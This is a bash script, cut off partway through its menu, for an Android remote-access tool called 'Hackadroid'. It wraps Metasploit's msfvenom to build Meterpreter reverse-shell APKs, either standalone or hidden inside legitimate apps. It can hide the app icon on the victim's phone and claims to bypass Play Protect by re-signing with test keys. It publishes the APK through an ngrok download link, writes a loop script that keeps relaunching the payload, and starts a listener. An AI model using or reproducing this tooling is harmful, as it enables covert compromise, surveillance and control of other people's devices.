#!/bin/bash

#################### HACKADROID ######################
# Project - Hackadroid
# access any android devices remotely               
# Author: Ashish Singh (ashishsingh103020@gmail.com)
# Date: 25 Dec 2020
# Copyright (c) 2020
# THE FIRST ON INTERNET
# LICENSE : APACHE 2
# CREATED BY ASHISH (just-hack)
######################################################


#########
# COLORS
#########

#colors
white="\033[1;37m"                                          ##
grey="\033[0;37m"                                           ##
purple="\033[0;35m"                                         ##
red="\033[1;31m"                                            ##
green="\033[1;32m"                                          ##
yellow="\033[1;33m"                                         ##
purple="\033[0;35m"                                         ##
cyan="\033[0;36m"                                           ##
cyan1="\033[1;36m"                                          ##
cafe="\033[0;33m"                                           ##
fiuscha="\033[0;35m"                                        ##
blue="\033[1;34m"                                           ##
nc="\e[0m"                                                  ## 


############
# DIRECTORY
############

#current working directory
dir=`pwd`


#######
# JAVA
#######

#silent and unset default jdk
_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
unset _JAVA_OPTIONS
alias='java "$_SILENT_JAVA_OPTIONS"'


##############
# MAIN CLASS
##############

user_id="$(logname)"
github_url="https://github.com/Bhaviktutorials/hackadroid/issues"
mixplorer_url="https://ozabhavik02.wixsite.com/bhaviktutorials/post/how-ai-is-changing-personal-data-tracking"
hackadroid_main="/usr/share/hackadroid"
error_log="${hackadroid_main}/logs/error_log"
hackadroid="${hackadroid_main}/hackadroid"
hackadroid_install="/usr/share"
clone="${hackadroid_install}/hackadroid"
msf_install="${hackadroid_install}/hackadroid"
hackadroid_icon="${hackadroid_main}/icon/hackadroid.png"
old_hackadroid="/usr/bin/hackadroid"
console="${hackadroid_main}/metasploit-framework*/msfconsole"
sign_jar="${hackadroid_main}/signapk"
icon_path="${hackadroid_main}/icon"

##########
# VERSION
##########

VERSION="1.0.1"


################
# PRINT MESSAGE
################

msg() {
	printf "${blue}[-] ${green}${1}\n${nc}"
}

norm_msg() {
	printf "${green}${1}\n${nc}"
}

error_msg() {
        printf "${red}[ ! ] ${white}${1}\n${nc}"
}

linefeed () {	
        printf  "\n"
}


##########
# SPINNER
##########

#spinner
spinner() {
        pid=$!
        spin='\|/-'
        i=0
        tput civis
        while kill -0 $pid 2>/dev/null
	do	
                i=$(( (i+1) %4 ))
                printf "\r${cyan1}[${spin:$i:1}]${nc} ${cyan1} $launch"
                sleep .1
	done
        printf "\r   ${green}[✔]${nc} ${green} $splashdown"
        sleep 1;echo 
        tput cnorm
}

##############
# TRAP CTRL+C
##############

#check for CTRL+C
trap ctrl_c INT
ctrl_c() {
        clear ; linefeed ; clear
        printf "\n"
        tput civis
        printf $red"[-] (Ctrl + C ) Pressed by user , Trying To Exit...\n"
        sleep 1.3
        linefeed
        printf $blue"[-] Stopping hackdroid Services...\n"
	sleep 1.0
        stop_hackadroid
        printf "\n"
        thankyou
        tput cnorm
        exit
}


#######
# ROOT
#######

#check root
function check_root() {
        if [ "$(whoami &2>/dev/null)" != "root" ] && [ "$(id -un &2>/dev/null)" != "root" ];then
                linefeed;
                error_msg "Admin user detected"
                printf "\n"
                error_msg "You must be root to run this script!"
                linefeed;
                error_msg "Use 'sudo !!'"
                printf "\n"
                exit 1
	fi
}


########
# NGROK
########

# stop ngrok server
function stop_ngrok() {	
        ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
        kill -9 $ngrok > /dev/null 2>&1
}



###########
# THANKYOU
###########

function thankyou() {
        printf "\e[1;92m
                      ++++++++++++++++++++++++++++++++++++++++++++++++++++
                      +\e[1;37m          Thankyou for using hackadroid.          \e[1;92m+\e[1;92m
                      +\e[1;37m     Keep supporting bhaviktutorilas on youtube.  \e[1;92m+\e[1;92m
                      +\e[1;37m         https://github.com/Bhaviktutorials       \e[1;92m+\e[1;92m
                      +\e[1;37m             Auhor & Develop by Ashish.           \e[1;92m+\e[1;92m
                      ++++++++++++++++++++++++++++++++++++++++++++++++++++\e[0m\n\n"        
}


######
# MSF 
######

check_hmsf() {
        [ -d "${hackadroid_main}/metasploit-framework-5.0.101" ] && msf=true
	
}

install_msf() {
	launch="patching msf update"
	splashdown="patched msf update" 
	(xterm -T "UPDATE MSF" -e "wget https://raw.githubusercontent.com/just-hack/hackadroid-setup/main/metasploit-framework.zip -O ${msf_install}/metasploit-framework.zip" && unzip ${msf_install}/metasploit-framework.zip -d ${msf_install} > /dev/null 2>&1) & spinner;echo -e "\e[0m"
	rm -rf ${msf_install}/metasploit-framework.zip > /dev/null 2>&1
	launch="Fetching gem"
	splashdown="Fetched gem"
	(xterm -T "BUNDLE & GEMS INSTALLATION" -e "cd ${msf_install}/metasploit-framework* && sudo gem install bundler:1.17.3 && bundle install && cd ${dir} && sleep 6 && echo [ ! ] done setup && sleep 3") & spinner;echo -e "\e[0m"
}


#########
#ZIPALIGN
#########

function fix_zipalign() {
	launch="Checking for align error"
	splashdown="Successfully fixed align error" ; echo
	sudo tar -xf ${hackadroid_main}/lib_gnu/android_gnu.tar.gz -C ${hackadroid_main}/lib_gnu/ > /dev/null 2>&1
        sudo chmod 777 ${hackadroid_main}/lib_gnu/ziperror/*
        sudo cp -rf * ${hackadroid_main}/lib_gnu/ziperror/* /usr/lib/x86_64-linux-gnu/android/ > /dev/null 2>&1
	sleep 10 & spinner ; echo -e "\e[0m"
}


####################
# HACKADROID SPLOIT
####################

main_update() {
	check_hmsf
        case $msf in
		true)
			#msf found
			launch="updating hackadroid"			
			splashdown="successfully updated hackadroid" ; echo 
			(xterm -T "UPDATING HACKADROID" -e "wget https://github.com/Bhaviktutorials/hackadroid/raw/main/hackadroid -O ${hackadroid} && rm -rf ${old_hackadroid} && cp -rf ${hackadroid} /usr/bin && chmod 777 /usr/bin/hackadroid") & spinner; echo -e "\e[0m"
			;;
		*)
			#msf not found	
			launch="updating hackadroid"
			splashdown="successfully updated hackadroid" ; echo 
			rm -rf ${hackadroid}
                        (xterm -T "UPDATING HACKADROID" -e "wget https://github.com/Bhaviktutorials/hackadroid/raw/main/hackadroid -O ${hackadroid} && rm -rf ${old_hackadroid} && cp -rf ${hackadroid} /usr/bin && chmod 777 /usr/bin/hackadroid &&sleep 4") & spinner; echo -e "\e[0m"
			launch="updating msf"
			splashdown="updated msf"
			install_msf
			;;
	esac

}


#########
# UPDATE
#########

function update() {
	version=$(curl -L -s https://raw.githubusercontent.com/Bhaviktutorials/hackadroid/master/hackadroid | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
	if [ "${1}" != "-u" ] || [ "${1}" != "--update" ]; then
		[ ${latest_version} != ${VERSION} ] && echo && msg "hackadroid update is available !!" && sleep 2.5 && echo && msg "Run hackadroid -u , hackadroid --update" && echo && exit 1;
	       #[ 1 -eq $(echo "${latest_version} != ${VERSION}" | bc -l) ]  && echo && msg "hackadroid update is available !!" && sleep 2.5 && echo && msg "Run hackadroid -u , hackadroid --update" && echo && exit 1;
        fi
}


###########
# INTERNET
###########

#check ineternet connectivity for update
function internet() {
ping -c 1 google.com > /dev/null 2>&1
if [ $? -eq 0 -a ! "${1}" = "--update" ] && [ $? -eq 0 -a ! "$1" = "-u" ]; then
        update
fi
}

function check_net() {
        ping -c 1 google.com > /dev/null 2>&1
        if [[ "$?" != 0 ]]
        then
                error_msg "No internet"
        exit 0
        fi
}

############
# UP-TO-DATE
############

function check_update() {	
        check_net
        version=$(curl -L -s https://raw.githubusercontent.com/Bhaviktutorials/hackadroid/master/hackadroid | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
        if [ ${latest_version} = ${VERSION} ];then		
                echo -e "\tReading \tpackage \tlists... \tDone
                         \tBuilding \tdependency \ttree       
                         \tReading \tstate \tinformation... \tDone
                         \thackadroid \tis \talready \tthe \tnewest \tversion \t($VERSION)." | awk '{$1=$1};1'
	        exit 1
	else
		main_update
		exit 1
	fi
}


########
# ASSIST
########

function assist() {
	man ${hackadroid_main}/man/manpage

}


########
# USAGE
########

usage() {
        cat <<EOF
Usage: $(basename $0) [OPTIONS] available

Hackadroid is a an advanced automated android exploit tool
that makes look android hacking simple.
Copyright 2020 <ashishsingh103020@gmail.com>
Options:

  -u, --update      Update hackdroid
  -v, --version     Display the current hackadroid version installed on your device
  -h, --help        Print this help message
  -a, --assist      List detail discription of hackadroid
  --fix-patches     Check missing packages & fix patches
  --print-error     Print previous executed log file 
  --fix-zipalign    Fix symbol lookup error of undefined symbol

For additional info, see: https://github.com/Bhaviktutorials/hackadroid

EOF
}


###########
# OPTS ARG
###########

#getopts argument
while true; do
        case "$1" in		
                -u|--update)			
	                check_update
			;;

                -h|--help)			
                        usage       
                        exit 1
			;;

                -v|--version)			
                        printf "version $VERSION\n"
                        exit 1
                        ;;

		-a|--assist)
			assist
			exit 1
			;;

		--fix-patches)			
			sed -i -e 's/\r$//' ${hackadroid_main}/setup
			chmod 777 ${hackadroid_main}/setup
		        ${hackadroid_main}/setup
			exit 1
			;;

		--print-error)
			cat ${error_log}
			exit 1
			;;

		--fix-zipalign)
                        fix_zipalign
			exit 1
			;;

                -*)			
                        echo "ERROR: unknown option '$1'" 1>&2
                        echo "see '--help' for usage" 1>&2
                        exit 1
                        ;;

                *)	
                        f=$1
                        break			
                        ;;
	esac
        shift
done


#######
# STOP
#######

function stop_hackadroid() {	
        {		
                for ((i = 0 ; i <= 100 ; i+=3)); do
                sleep 0.1
                echo $i
	done
} | whiptail --gauge "Please wait hackadroid is shutting down..." 6 50 0

}


#########
# BANNER
#########

hackadroid_banner() {	
        random=$(shuf -i 1-6 | head -1)
        if [[ $random -eq 1 ]];
	then
		banner1
        elif [[ $random -eq 2 ]];
	then
                banner2
        elif [[ $random -eq 3 ]];
	then
                banner3
        elif [[ $random -eq 4 ]];
	then
                banner4
        elif [[ $random -eq 5 ]];
	then
                banner5
        elif [[ $random -eq 6 ]];
	then
                banner6
	fi
}

banner1 () {
	echo -ne '\e[8;41;98t'        
printf "     
${white}    ╔══════════════════════════════════════════════════════════════════════════════════════╗
${white}    ║                                                                                      ║ 
${white}    ║${green}   ██░ ██  ▄▄▄       ▄████▄   ██ ▄█▀▄▄▄      ▓█████▄  ██▀███   ▒█████   ██▓▓█████▄ ${white}   ║  
${white}    ║${green}  ▓██░ ██▒▒████▄    ▒██▀ ▀█   ██▄█▒▒████▄    ▒██▀ ██▌▓██ ▒ ██▒▒██▒  ██▒▓██▒▒██▀ ██▌${white}   ║  
${white}    ║${green}  ▒██▀▀██░▒██  ▀█▄  ▒▓█    ▄ ▓███▄░▒██  ▀█▄  ░██   █▌▓██ ░▄█ ▒▒██░  ██▒▒██▒░██   █▌${white}   ║ 
${white}    ║${green}  ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄░██▄▄▄▄██ ░▓█▄   ▌▒██▀▀█▄  ▒██   ██░░██░░▓█▄   ▌${white}   ║ 
${white}    ║${green}  ░▓█▒░██▓ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄▓█   ▓██▒░▒████▓ ░██▓ ▒██▒░ ████▓▒░░██░░▒████▓ ${white}   ║ 
${white}    ║${green}   ▒ ░░▒░▒ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒▒▒   ▓▒█░ ▒▒▓  ▒ ░ ▒▓ ░▒▓░░ ▒░▒░▒░ ░▓   ▒▒▓  ▒ ${white}   ║ 
${white}    ║${green}   ▒ ░▒░ ░  ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░ ▒   ▒▒ ░ ░ ▒  ▒   ░▒ ░ ▒░  ░ ▒ ▒░  ▒ ░ ░ ▒  ▒ ${white}   ║ 
${white}    ║${green}   ░  ░░ ░  ░   ▒   ░        ░ ░░ ░  ░   ▒    ░ ░  ░   ░░   ░ ░ ░ ░ ▒   ▒ ░ ░ ░  ░ ${white}   ║ 
${white}    ║${green}   ░  ░  ░      ░  ░░ ░      ░  ░        ░  ░   ░       ░         ░ ░   ░     ░    ${white}   ║      
${white}    ╠═══════════════════════╦══════════════════════════════════════════════════════════════╣
${white}    ║      ${green}Version ${white}1.0.1 ${white}   ║           ${white}Author of Hackadroid ${white}- ${green}Ashish${white}                      ║
${white}    ╚═══════════════════════╩══════════════════════════════════════════════════════════════╝\n"
echo
}    

banner2 () {
	echo -ne '\e[8;41;102t'        
printf "${red}                                                                                                
   @@@  @@@   @@@@@@    @@@@@@@  @@@  @@@ ${green}  @@@@@@  ${blue} @@@@@@@   @@@@@@@    @@@@@@   @@@  @@@@@@@  ${red}     
   @@@  @@@  @@@@@@@@  @@@@@@@@  @@@  @@@ ${green} @@@@@@@@ ${blue} @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  @@@@@@@@ ${red} 
   @@!  @@@  @@!  @@@  !@@       @@!  !@@ ${green} @@!  @@@ ${blue} @@!  @@@  @@!  @@@  @@!  @@@  @@!  @@!  @@@ ${red}     
   !@!  @!@  !@!  @!@  !@!       !@!  @!! ${green} !@!  @!@ ${blue} !@!  @!@  !@!  @!@  !@!  @!@  !@!  !@!  @!@ ${red}     
   @!@!@!@!  @!@!@!@!  !@!       @!@@!@!  ${green} @!@!@!@! ${blue} @!@  !@!  @!@!!@!   @!@  !@!  !!@  @!@  !@! ${red}     
   !!!@!!!!  !!!@!!!!  !!!       !!@!!!   ${green} !!!@!!!! ${blue} !@!  !!!  !!@!@!    !@!  !!!  !!!  !@!  !!! ${red}     
   !!:  !!!  !!:  !!!  :!!       !!: :!!  ${green} !!:  !!! ${blue} !!:  !!!  !!: :!!   !!:  !!!  !!:  !!:  !!! ${red}     
   :!:  !:!  :!:  !:!  :!:       :!:  !:! ${green} :!:  !:! ${blue} :!:  !:!  :!:  !:!  :!:  !:!  :!:  :!:  !:! ${red}     
   ::   :::  ::   :::   ::: :::   ::  ::: ${green} ::   ::: ${blue}  :::: ::  ::   :::  ::::: ::   ::   :::: :: ${red}     
    :   : :   :   : :   :: :: :   :   ::: ${green}  :   : : ${blue} :: :  :    :   : :   : :  :   :    :: :  :  ${red}                                                                                                     
                      ${blue}-------------------------------------------------                 
                               ${white}HACK ANDROID REMOTELY - BY ${green}ASHISH
\n"
echo -e "\e[0m"
}  

banner3(){
	echo -ne '\e[8;41;95t'        
printf "${green}
       __----_ 
     /##|       \ 
    /###|     |  \______ 
   |####|               \ 
   |####|      ___   ___|${white}© ${green}
   \####/     _____ /            
     \###    /                       
     ${white}=====ÊšçØ      ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐           ${green}  //
     /        \     ${white}╠╦╝├┤ ││││ │ │ ├┤            ${green} //   
    |   |_      \   ${white}╩╚═└─┘┴ ┴└─┘ ┴ └─┘           ${green}//${yellow}  Hackadroid ${white}remote backdoor android${green} 
    \___/      |    ${cyan}╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗  ${green}  //
     \         /    ${cyan}╠╩╗╠═╣║  ╠╩╗ ║║║ ║║ ║╠╦╝  ${green} //${white}   Created by ${green}Δ Ş Ħ Ɨ Ş Ħ ${green} 
      |    |__|__   ${cyan}╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═ ${green} //
      (______)___)  ${yellow}Version 1.0.1 - just hack it !!
\n"
echo -e "\e[0m"
}

banner4(){
        echo -ne '\e[8;41;99t'        
echo -e "${cyan1}	                                    ______    "
echo "	                                 .-        -. "
echo "	                                /            \         "
echo "	                               |,  .-.  .-.  ,|      "
echo "	                               | )(_ /  \_ )( |"
echo "	                               |/     /\     \|    "
echo -e $red"	                   $yellow  (@_   $cyan1    <__    ^^    __>        "
echo -e $red"	                      ) \_______$cyan1""\__|IIIIII|__/$red""____________________ "
echo -e $red"	               (_)$yellow\@8@8{}<$red""________________________________________$yellow> "
echo -e $red"	                      )_/    $cyan1     \ IIIIII /                    "
echo -e $red"	                   $yellow  (@        $cyan1    --------                      "
echo -e $cyan1"		                    Hackadroid Version $red 1.0.1 "
echo -e $cyan1"		                   Access victim device remotely"
echo -e " 		                Author : $white""a s h i s h ${red}(just_hack)"
echo -e $red"  	                  Penetration$cyan1 attacks on any$red Android Platform	           ";

echo -e $green ""
        echo "                       ╔──────────────────────────────────────────────╗"
        echo "                       |            Hackadroid Framework ${VERSION}        |"
        echo "                       |         Hack & Remote android devices        |"
        echo "                       ┖──────────────────────────────────────────────┙"

echo -e "\e[0m"  
}

banner5() {
	 echo -ne '\e[8;41;91t'	 	 
printf "${white}   
      ┌──────────────────────────────────────────────────────────────────────────────┐
      │                            * ${grey}Hackadroid System Login${white} *                       │
      ├──────────────────────────────────────────────────────────────────────────────┤
      │                                                                              │
      │                        ┌───────────────────────────────┐                     │
      │             ${grey}Username${white} : │           hackadroid          │                     │
      │                        │───────────────────────────────│                     │
      │             ${grey}Password${white} : │        ${red}a${green}n${yellow}d${white}r${red}o${blue}i${yellow}d${white}_${yellow}m${red}o${blue}n${green}i${white}t${yellow}o${red}r${cyan}i${green}n${red}g${white}     │                     │
      │                        └───────────────────────────────┘                     │
      │                      ${green} https://github.com/bhaviktutorials ${white}                    │
      │                                                                              │
      │                           ${white} WRITTEN BY ${red}𝐀 ${blue}𝐒 ${yellow}𝐇${green} 𝐈${red} 𝐒 ${yellow}𝐇   ${white}                         │
      │                                                                              │
      └──────────────────────────────────────────────────────────────────────────────┘\n"
echo
}

banner6() {
        echo -ne '\e[8;41;91t'	       
echo -e "${green}   
        TB               BT
         TB             BT
          TBBBBBBBBBBBBBT
         dBBBBBBBBBBBBBBBb       
        dBBBBBBBBBBBBBBBBBBb     
       dBBBb dBBBBBBbBb dBBBb    
       MBBBBBBBBBBBBBBBBBBBBM                                                          
${white}        H A C K A D R O I D ${green}      
 dBBB  MBBBBBBBBBBBBBBBBBBBBM  dBBb
dBBBBb MBBBBBBBBBBBBBBBBBBBBM dBBBBb   ${green}//${white} exploit and control android ${green} // ${green}
MBBBBM MBBBBBBBBBBBBBBBBBBBBM MBBBBM 
MBBBBM MBBBBBBBBBBBBBBBBBBBBM MBBBBM    ${green}//${white} coded by : A S H I S H ${green} // ${green}
 qBBp  MBBBBBBBBBBBBBBBBBBBBM  qBBp
       qBBBBBBBBBBBBBBBBBBBBp
        qBBBBBBBBBBBBBBBBBBBp
           MBBBM      MBBBM
           MBBBM      MBBBM
           qBBBp      qBBBp
            qBBp       qBBp \n ${nc}"
}

function hackdroid_banner() {
        clear
        banner_changer
}


#######
# MAIN
#######

#user internal ip address
function user_ip() {
        local_ip=`hostname -I | awk '{print $1}'`
}

#user local host
function user_lhost() {
        lhost=$(zenity --title="SET LHOST" --text "enter your local ip" --entry-text "$local_ip" --entry --width 300 --height 120 2> /dev/null) 
}

#user local port
function user_lport() {
        lport=$(zenity --title="SET LPORT" --text "enter your local port" --entry-text "4444" --entry --width 300 --height 120 2> /dev/null) 
}

#user android payload
function user_payload() {
        android_payload=$(zenity --list --title "SET PAYLOAD" --text "\nChoose payload option:" --radiolist --column "Select" --column "Payload" FALSE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" TRUE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)	
}

#user output payload name
function user_output_payload_name() {
        payload_name=$(zenity --title "PAYLOAD NAME" --text "set output payload name" --entry --entry-text "hackadroid.apk" --width 300 --height 120 2> /dev/null);
}

#user payload that to be embeded
function embed_payload() {
        bind_apk=$(zenity --title "select original payload to be bind" --file-selection --file-filter "*.apk" --multiple --filename="${hackadroid_main}/application"  2> /dev/null)
}

#open issue on github
function github_issue() {
	if (whiptail --title "HACKADROID" --yesno "ERROR ! HAS BEEN OCCURRED OPEN ISSUE FOR YOU ON GITHUB ?" 8 78); then
		sudo -u $user_id -H firefox --new-tab ${github_url} > /dev/null 2>&1
                exit 1
	else
		thankyou
		exit 0
	fi	
}


##########
# LISTNER
##########

function start_listner () {
        cat <<EOF > auto_handler.rc
        use exploit/multi/handler
        set payload $android_payload
        set LHOST $lhost
        set LPORT $lport
        exploit 
EOF
}


##########
# HANDLER
##########

#Run exploit
function run_exploit() {
	launch="Starting Hackadroid Framework"
	splashdown="Please wait .... it's taking time more then usual"
	sleep 4 & spinner;echo
	msfconsole -r auto_handler.rc 2> /dev/null
}

#Run exploit for persistent using 5.0.101
function run_exploit_pers() {
        launch="Starting Hackadroid Framework"
	splashdown="Please wait .... it's taking time more then usual"
	sleep 4 & spinner;echo
	${console} -r auto_handler.rc 2> /dev/null
}

#auto meterpreter
function auto_meterpreter() {
        cat <<EOF > meterpreter.rc
        cd /sdcard
        upload persistent.sh /sdcard        
EOF
}


#############
# PERSISTENT
#############

#Persistent script 
function persistent_script() {
	cat <<EOF > persistent.sh
        #!/bin/bash
        while true
        do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
        sleep 20
        done 
EOF
}


#################
# SELECT LISTNER
#################

#listner raw payload multiple options
function start_listner_raw () {	
	auto_listner=$(whiptail --title "HACKADROID LISTNER" --menu "SELECT HACKADROID LISTNER YOU WISH." 20 60 13 \
        "1" "AUTO PERSISTNET" \
        "2" "NORMAL LISTNER" \
        "3" "EXIT" 3>&1 1>&2 2>&3)
        case $auto_listner in		
                1)			
                        ##with auto persistent listner
                        auto_meterpreter
                        persistent_script
                        start_listner
                        sed -i '/set LPORT.*/ a set AutoRunScript meterpreter.rc' auto_handler.rc
                        whiptail --title "HACKADROID" --msgbox "type 'shell' once connected to device and copy ( sh persistent.sh ) this and paste to the terminal after it." 8 78
                        ##call exploit
                        run_exploit_pers       
			;;	      
                2)
                        start_listner
                        run_exploit               
                        ;;
                3)
			thankyou
			exit 1
			;;                      
       esac        
}


###########
# SEND APK
###########

function send_apk() {
	apk_link=$(zenity --question --title "DOWNLOAD APK FILE" --text "send apk to download link?" --width 300 --height 100 2> /dev/null)
        if [ $? -eq 0 ];then		                
	        mkdir -p /var/www/html/hackadroid > /dev/null 2>&1
		rm -rf /var/www/html/index.html
	        cp -R ${payload_name} /var/www/html/hackadroid
	        service apache2 start > /dev/null 2>&1
	        ngrok start -all > /dev/null 2>&1 &
                launch="Deploying apk to Dowmload link"
                splashdown="Deployed apk to Download link"
	        sleep 10 & spinner;echo -e "\e[0m"
	        link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") 
                echo -e $green "  [✔]  Download link :${white} $link";echo -e "\e[0m"
		sleep 5
	 fi
}


#######
# ARCH
#######

#check arch
function arch() {	
        com="$(uname -m)"
        if [ "$com" = "x86_64" ] || [ "$com" = x86_32 ]
        then		
	        send_apk
	fi
}


########
# CLEAN
########

function clean() {
	rm -f auto_handler.rc meterpreter.rc > /dev/null 2>&1
}


#######
# JADX
#######

function install_jdx() {
	launch="Installing Jadx"
	splashdown="Jadx Installed"
        jadx_v=1.2.0
        jadx_d=/usr/local/bin
	rm -f ${jadx_d}/jadx
        (xterm -T "INSTALLING JADX" -e "wget https://github.com/skylot/jadx/releases/download/v${jadx_v}/jadx-${jadx_v}.zip && unzip jadx-${jadx_v}.zip -d $jadx_d-${jadx_v} && rm -rf jadx-${jadx_v}.zip") & spinner ;echo -e "\e[0m"
        ln -s $jadx_d-${jadx_v}/bin/jadx $jadx_d/jadx
        ln -s $jadx_d-${jadx_v}/bin/jadx-gui $jadx_d/jadx-gui
}

check_jdx() {	
	which jadx-gui > /dev/null 2>&1
        if [ "$?" -eq "1" ]; then		
	        if (whiptail --title "ERROR MSG" --yesno "Jadx not found !! Do you want me to install for you now?" 8 78); then
			install_jdx
		else
			thankyou
			exit 1
		fi
	fi
}


######
# RUN
######

internet
check_root
stop_ngrok


#######
# MENU
#######

while :
do	
	clear
	hackadroid_banner
        printf "${white}"
        printf "[ 1 ] create raw payload                     [ 2 ] create embeded payload\n\n"	
        printf "[ 3 ] bypass play protect / sign apk (auto)  [ 4 ] bypass play protect / sign apk (manual)\n\n"        
        printf "[ 5 ] decompile apk                          [ 6 ] recompile apk\n\n"        
        printf "[ 7 ] generate persistent (raw payload)      [ 8 ] generate persistent (embeded payload)\n\n"       
        printf "[ 9 ] add auto allow permission              [ 10 ] change name and icon (raw payload)\n\n"       
        printf "[ 11 ] start listner (over lan)              [ 12 ] start listner (over wan)\n\n"        
        printf "[ 13 ] zipalign apk                          [ 14 ] dex - java (analyse apk source code)\n\n\n"	        
	printf $cyan1"┌─["$green"Hackadroid"$cyan1"]──["$red"~"$cyan1"]──["$green"MAIN - MENU"$cyan1"]\n"
	printf $cyan1"└─────► " ;tput sgr0
        read option
        linefeed

	if [ $option = 01 ] || [ $option = 1 ]
	then
              
		user_ip
		user_lhost
		user_lport
		user_payload
	        user_output_payload_name
		hide_payload=$(zenity --question --title "AUTO HIDE PAYLOAD" --text "auto hide payload once installed in victim phone?" --width 300 --height 100 2> /dev/null)
		if [ $? -eq 0 ];then
			whiptail --title "WARNING" --msgbox "Auto persistent script will not work if payload is hidden." 8 78
		        launch="Injecting auto hide script"
		        splashdown="Injected auto hide script"
	                sleep 5 & spinner;echo
                        launch="Generating a raw paylaod"
		        splashdown="Generated a raw payload"			
			(msfvenom -p ${android_payload} LHOST=${lhost} LPORT=${lport} --platform android --arch dalvik AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o ${payload_name} > ${error_log} 2>&1 /dev/null 2>&1) & spinner;echo -e "\e[0m" 
		else			
		        launch="Injecting permission in apk"
		        splashdown="Injected permission in apk"
	                sleep 5 & spinner;echo		        
                        launch="Generating a raw paylaod"
		        splashdown="Generated a raw payload"			
			(msfvenom -p ${android_payload} LHOST=${lhost} LPORT=${lport} --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o ${payload_name} > ${error_log} 2>&1 /dev/null 2>&1) & spinner;echo -e "\e[0m"
		fi                
		success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
	                notify-send -t 30000 'hackadroid' "apk sucessfully build" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfilly build and save as ${success}"
		else		
		        zenity --error  --width=300 --height=100 --text "unable to build apk try again !! or open issue on github"
		        github_issue
		fi
	        arch	        
		start_listner_raw
		thankyou
		clean
		break;

	elif [ $option = 02 ] || [ $option = 2 ]
	then
		
		user_ip
		user_lhost
		user_lport
		user_payload
		embed_payload
		user_output_payload_name
		hide_payload=$(zenity --question --title "AUTO HIDE PAYLOAD" --text "auto hide payload once installed in victim phone?" --width 300 --height 100 2> /dev/null)
		if [ $? -eq 0 ];then			
		        launch="Injecting auto hide script"
		        splashdown="Injected auto hide script"
	                sleep 5 & spinner;echo
                        launch="Generating embed backdoor paylaod"
		        splashdown="Generated embeded backdoor payload"			
			(xterm -T "EMBED PAYLOAD" -e "sudo msfvenom -x ${bind_apk} -p ${android_payload} LHOST=${lhost} LPORT=${lport} --platform android --arch dalvik AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o ${payload_name} 2>&1 | tee ${error_log}") & spinner;echo -e "\e[0m"	        
		else			
		        launch="Injecting permission in apk"
		        splashdown="Injected permission in apk"	               
	                sleep 5 & spinner;echo
                        launch="Generating embed backdoor paylaod"
		        splashdown="Generated embeded backdoor payload"					
		       	(xterm -T "EMBED PAYLOAD" -e "sudo msfvenom -x ${bind_apk} -p ${android_payload} LHOST=${lhost} LPORT=${lport} --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o ${payload_name} 2>&1 | tee ${error_log}") &spinner;echo -e "\e[0m"		       
		fi
		success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
		        notify-send -t 30000 'hackadroid' "apk sucessfully embeded & build" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfully embeded and saved as ${success}"
		else
		        zenity --error  --width=300 --height=100 --text "unable to embed and build apk try again !! else open issue on github"
		        github_issue
		fi
		arch		
		auto_listner=$(zenity --question --title "AUTO LISTNER" --text "start auto listner ?" --width 300 --height 100 2> /dev/null)
                if [ $? -eq 0 ];then                        			
		        start_listner
		        run_exploit
		else	
	                thankyou
	                clean		
		        exit 1
		fi
		thankyou
		clean
		break; 

	elif [ $option = 03 ] || [ $option = 3 ]
	then
			  
		unsign_apk=$(zenity --title "select payload you wish to sign / bypass play protect" --file-selection --file-filter "*.apk"  --multiple --filename "${HOME}/Desktop"  2> /dev/null)
		payload_name=$(zenity --title "SIGN APK NAME" --text "enter name for signed payload " --entry --entry-text "signed.apk" --width 270 --height 120 2> /dev/null)
		launch="cheking certificate of apk"
		splashdown="checked certificate of apk"
		sleep 4 & spinner;echo
		launch="Signing apk using pk8 test key"
		splashdown="Signed apk using pk8 test key"
		sleep 3 & spinner;echo
		java -jar ${sign_jar}/signapk.jar ${sign_jar}/testkey.x509.pem ${sign_jar}/testkey.pk8 ${unsign_apk} ${payload_name}
		launch="Generating fully undectectable payload"
		splashdown="Generated fully undectectable payload "
		sleep 5 & spinner;echo -e "\e[0m"
		success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
		        notify-send -t 30000 'hackadroid' "apk sucessfully signed" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfully sign and saved as ${success}"
		else		   
		        zenity --error  --width=300 --height=100 --text "unable to sign an apk try again !! or open issue on github"
		        github_issue
		fi
		arch
		thankyou		
		break;

	elif [ $option = 04 ] || [ $option = 4 ]
        then
	
